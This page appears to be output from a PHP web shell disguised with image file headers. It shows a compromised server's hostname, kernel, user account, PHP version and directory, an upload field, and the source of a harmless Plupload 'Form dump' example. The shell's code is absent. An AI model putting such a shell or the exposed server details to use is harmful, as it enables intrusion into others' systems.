ÿØÿà JFIF ` ` ÿþ
Server : Apache System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : tkt_travelbus ( 1137) PHP Version : 7.0.0p1 Disable Function : mysql_pconnect Directory : /tkt_travelbus/www/js/plupload/examples/ |
Upload File : |
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"/> <title>Plupload - Form dump</title> </head> <body style="font: 13px Verdana; background: #eee; color: #333"> <h1>Post dump</h1> <p>Shows the form items posted.</p> <table> <tr> <th>Name</th> <th>Value</th> </tr> <?php $count = 0; foreach ($_POST as $name => $value) { ?> <tr class="<?php echo $count % 2 == 0 ? 'alt' : ''; ?>"> <td><?php echo htmlentities(stripslashes($name)) ?></td> <td><?php echo nl2br(htmlentities(stripslashes($value))) ?></td> </tr> <?php } ?> </table> </body> </html>